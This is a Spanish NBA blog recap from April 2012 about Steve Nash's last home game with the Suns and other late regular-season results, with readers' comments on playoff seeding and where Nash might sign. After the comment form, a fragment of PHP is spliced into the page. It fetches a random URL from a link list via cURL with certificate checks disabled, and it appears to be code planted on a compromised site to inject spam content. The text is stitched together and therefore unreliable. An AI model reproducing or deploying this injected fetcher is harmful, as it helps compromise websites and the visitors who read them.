La Crónica: Steve Nash se despide de Phoenix

26 de April de 2012 por TheDeerHunter

Penúltima jornada de regular especialmente emotiva en el US Airways Center de Phoenix, donde Steve Nash se despedía de la que ha sido su afición en las últimas 8 campañas, así como en las 2 primeras de su carrera. Se marcha sin ningún anillo pero con dos MVPs, a la espera de que durante este verano varios candidatos se lo rifen. Pocos podrían entender esta situación mejor que los fans de Phoenix que no sienten hacia él nada más que agradecimiento. Muchos buenos ratos les ha hecho pasar a los parroquianos. Su mayor logro es haberles recordado a todos cómo era eso de soñar. No pudo ser y no pudo irse con la última victoria. No pudieron con los Spurs de Pat Mills y Tiago Splitter (110-106). Podemos decir que bastante han hecho los Suns con rozar los playoffs con los mimbres que tienen.

Con la victoria de los Spurs los Bulls siguen obligados a apretar hasta el último día por el mejor balance de la liga. Anoche doblegaban a los Pacers en un choque al tran-tran (92-87). El mejor de los Bulls fue Korver, y el de los Pacers Lance Stevenson.

Por su parte, los Clippers cierran su regular perdiendo la 4ª plaza. En manos de los Grizzlies estará mañana conservarla. No era Paul de la partida, pero sí un extraordinario Randy Foye. Él y Griffin estuvieron demasiado solos. Como sus últimos rivales, los Knicks impusieron colectivo (93-99). Los Sixers también ganaron (ellos a Milwaukee, 90-85) y aún no está claro quien quedará séptimo y quien octavo. Por su parte Denver logró una victoria agridulce ante Oklahoma (106-101). Su rival en primera ronda serán los Lakers.

Terminando, los Bobcats se quedan a una derrota del récord de inutilidad. Ayer tocaba contra unos Magic arrasados por las bajas y ni por esas (95-102). Redick y Anderson les liaron un buen cirio. Los gatetes cogen a dos rivales cualquiera y los convierten en Stockton y Malone. Wizards también tumbó a Cleveland (96-85).

PREMIOS

MVP: Los Wizards encadenan la quinta victoria consecutiva de la mano de John Wall, autor de 21 puntos, 7 rebotes, 13 asistencias y 7 robos. Evan Turner fue otro de los destacados del día con 29 puntos, 13 rebotes y 6 asistencias.

Rookie: No tiene mala pinta el rookie de los Bucks Tobias Harris aunque está verde como la hierba de un campo de futbol. Anoche gozó de minutos y se fue a los 15 puntos y 13 rebotes.

Sorpresa: JJ Redick anotó 31 puntos, Randy Foye 28, Jodie Meeks  y Patrick Mills 27, Tiago Splitter 26… Estos últimos partidos de la regular son muy propensos a las actuaciones sorprendentes.

Decepción: 1 más y los Bobcats serán el equipo con peor porcentaje de victorias de la historia. 22 derrotas seguidas…

Esfuerzo en vano: La pareja maravilla de los Thunder sigue a todo trapo a pesar de que los Playoffs están a la vuelta de la esquina. 30 puntos, 9 asistencias, 6 rebotes y 4 tapones de Russell Westbrook y 32 puntos de Kevin Durant. Desgraciadamente para los Thunder, la victoria les fue esquiva. Los 29 puntos, 10 rebotes y 6 asistencias de Blake Griffin también se quedaron sin premio.

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Bueno que empiecen los playoffs porque la mayoría de los equipos están ya reservando gente para ellos.
    De lo que queda por decidir:
    1) Primer puesto de la regular: Chicago y San Antonio empatados. A los Bulls les vale hacer lo mismo que a los Spurs para asegurarse el factor cancha en una posible final y juegan contra unos enrachados Wizards fuera. San Antonio juega fuera contra Golden State. Creo que los 2 jugarán con suplentes y que la suerte decidirá.
    2) Ventaja campo Celtics-Hawks: Será eliminatoria de primera ronda pero queda por decidir quién tendrá el factor cancha a favor. Los Celtics necesitan ganar y que pierda Atlanta para tener factor cancha. Boston juega en casa con los Bucks y deberían ganar aunque Doc jugará con los reservas casi seguro. Los Hawks reciben a Dallas que se juega ser 6º u 7º y jugar con OKC o Lakers. Creo que Atlanta ganará y se quedará el factor cancha
    3) Septimo puesto del Este: Empate Knicks-Sixers. Los Knicks con ventaja en caso de empate juegan en Charlotte así que está claro. Eliminatoria interesantísima Heat-Knicks para primera ronda.
    4) Ventaja campo Grizzlies-Clippers: Parece increible pero los Grizzlies lo tienen en la mano. Reciben a Orlando que tiene mil bajas y no se juega nada así que supongo que ganarán. Otra elimitoria interesantísima en la que para mí los Grizzlies son favoritos.
    5) Sexto puesto del Oeste: Dallas y Denver se lo juegan con un partido de ventaja para los Nuggets que juegan en Minnesotta que está en caida así que creo que está claro. Los Lakers para Denver donde creo que son claramente favoritos los de LA y OKC para Dallas. En principio por lo visto a Dallas es claro favorito OKC pero Dallas es un equipo con mucha experiencia que podría darles problemas
    Y el domingo, empieza lo bueno de verdad. Apasionantes primeras eliminatorias las Celtics-Hawks, Heat-Knicks, Grizzlies-Clippers y Thunder-Mavs, ¡Que empiece el espectaculo!

      Citar

  2. simon dice:
    #2

    Aparte de Indiana que otro equipo ha terminado ya su regular?

      Citar

  3. simon dice:
    #3

    simon:
    Aparte de Indiana que otro equipo ha terminado ya su regular?

    Ahh vale ya vi que eran Phoenix, Clippers y OKC, es que repasé dos o tres veces la clasificación pero no me di cuenta en ellos.

      Citar

  4. rojorob dice:
    #4

    GreenPride

    Creo que los Celtics tienen el factor cancha contra Atlanta por ser campeones de la División Atlántico. Pero no estoy seguro.

      Citar

  5. Blade Petrovic dice:
    #5

    Y meeks se mete un partidazo para acabar una buena temporada.Me parece q el factor cancha ayudara,a los grizlies y hoy por hoy los veo capacitados para ganar a los clippers

      Citar

  6. GreenPride dice:
    #6

    Hola rojorob, pues no. Los Celtics tienen asegurado ser 4º a la hora de hacer los emparejamientos por ser campeones de división. Es decir si los Hawks quedan con mejor record a efectos de hacer el cuadro de playoffs se considera a Boston 4º y a Atlanta 5º.
    Pero luego, a efectos de jugar su eliminatoria no ocurre eso. Es decir si Atlanta tiene mejor record tendrá ventaja campo en la eliminatoria aunque a efectos de cuadro sea 5º y Boston 4º.
    Espero haberme explicado.

      Citar

  7. Esteban dice:
    #7

    increibles 3 derrotas de los clippers en los ultimos juegos, suns hawks y knicks, que no solo les privan de ser terceros y enfrentarse con unos insulsos denver, sino que deberan jugar con menphis y casi seguero que sin ventaja de localida, ahora si que los veo fritos

    aunque… dos ultimos juegos bestiales de griffin, quiza dos de los mejores 5 de su temporada, puede hacer pensar que se estaba guardando algo para los PO, si es asi y da un paso al frente sus chances aumentan, si isgue jugando como toda lka temporada, puede despedirse tempranamente de la serie

      Citar

  8. ralage dice:
    #8

    Pues vamos a ver que pasa con Nash.
    Por dinero, nadie le va a ofrecer más que Phoenix, pero no creo que le puedan ofrecer una mejor plantilla por que pocos Agentes Libres querrán ir a Arizona, como mucho un Batum

      Citar

  9. GreenPride dice:
    #9

    Nash es un tío peculiar así que no me extrañaría que acabara renovando y finalizando su carrera en los Suns. Dicho esto, yo creo que se merece fichar por un contendiente y hacer su último intento de ganar el anillo. Si decide esto, le veo encajar genial en los Lakers (mal que me pese). También le vendría de perlas a los Heat pero no sé si el bueno de Steve estaría dispuesto a aguantar los egos de LeBron y Wade. Son los dos claros candidatos entre los contendientes ya que Bulls, Clips y Thunder tienen bases All-Star y jóvenes y los Spurs a Parker. Sería un gustazo verle en Boston pero con Rondo y la remodelación que se espera para el año que viene no lo veo como opción

      Citar

  10. nach dice:
    #10

    pues yo pensé en que aparte de lakers o miami,tiene otras 2 opciones:clippers y boston,pero sobre todo clippers.este año estaban jugando con billups de 2 y juntar a un jugador que domina el pick&roll como nash con griffin…

      Citar

  11. lost dice:
    #11

    Alguien tiene pensado hacer un artículo especial en honor de los Nets? Si alguien lo escribe tendría que ser un aficionado de los Nets, que haya vivido grandes momentos con Dr.J, Kidd o Drazen. Sinceramente me gustaría leerlo.

      Citar

  12. simon dice:
    #12

    Yo no lo veo en Clippers, creo que es de los equipos en los que menos los veo. Billups y Nash no juegan parecido no veo a Nash jugando de 2…

      Citar

  13. TheDeerHunter dice:
    #13

    lost:
    Alguien tiene pensado hacer un artículo especial en honor de los Nets? Si alguien lo escribe tendría que ser un aficionado de los Nets, que haya vivido grandes momentos con Dr.J, Kidd o Drazen. Sinceramente me gustaría leerlo.

    No conozco muchos aficionados a los Nets en general, pero menos aún que vivieran grandes momentos con el Dr. J en sus filas. No creo que exista ni uno solo en toda España, de verdad.

      Citar

  14. nach dice:
    #14

    pues yo en clippers lo veo,el tema será como pegue con paul,ambos necesitan mucho balón,por eso me cuesta más verlo en miami con wade y lebron,en boston defensivamente cantaría.orlando?dallas?tiene buena relación con nowitzki y kidd se les marcha este verano…

      Citar

  15. Esteban dice:
    #15

    nash y cp3 juntos? no me hagan reir

    los clippers en su momento debieron esperar y no hacerse con paul, sencillamente porq luego de este año no va a renovar alli y se quedaran sin nada, si se hubiesen quedado con gordon y kaman, y esperaban un año mas siendo intrascendentes (este año no son mucho mas que un equipo con aspiracion a segunda ronda seamos sinceros) este año podrian haber ido por nash y d´antoni, ya que no tendrian tecnico ni base, y contarian con gordon con un contrato por varios años

    otra movida que podria hacerse si en los clippers, es traspasar a paul por howard si el magic acepta, ambos acaban contrato prox temporada y ninguno en principioo creo que renueve al fin de esa temporada, y asi hacer un hueco para fichar a nash de base

    los pacers sino podrian traspasar a sus bases por un escolta de nivel, y hacer hueco a nash alli

    pero creo que candidato natural para nash seria orlando, el unico equipo con un all-star, semi candidato a campeon, que realmente necesita un base de las caracteristicas de nash, aunque creo que su relacion con j-rich no es la mejor

    olvidense del heat, nash amasa la bolla mas q wade y lebron juntos, son altamente incompatibles, nash debe jugar con tiradores a sus costados, no con tios q juegen de “base” en el puesto de escolta y alero, los haria algo mejor quiza si, pero no mucho y seria un desperdicio

      Citar

  16. infante dice:
    #16

    Triple doble de Ben Uzoh!!! Parece que ultimamente los regalan en la NBA…ten cuidado, tu puedes ser el siguiente!!!
    Abro pregunta para la encuesta: ¿Creeis que Ben le puede discutir a Chuck Hayes el honor de ser el jugador mas malo en hacer un triple doble? Ahi lo dejo.

      Citar

  17. Esteban dice:
    #17

    Estos ultimos partidos de temp se prestan para cualquier cosa, de ahí el problema de q no haya descensos

      Citar

  18. Sancho88 dice:
    #18

    Yo conozco un tipo que es de los Nets. Y efectivamente, es un tipo muy raro y muy extraño, jejeje

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>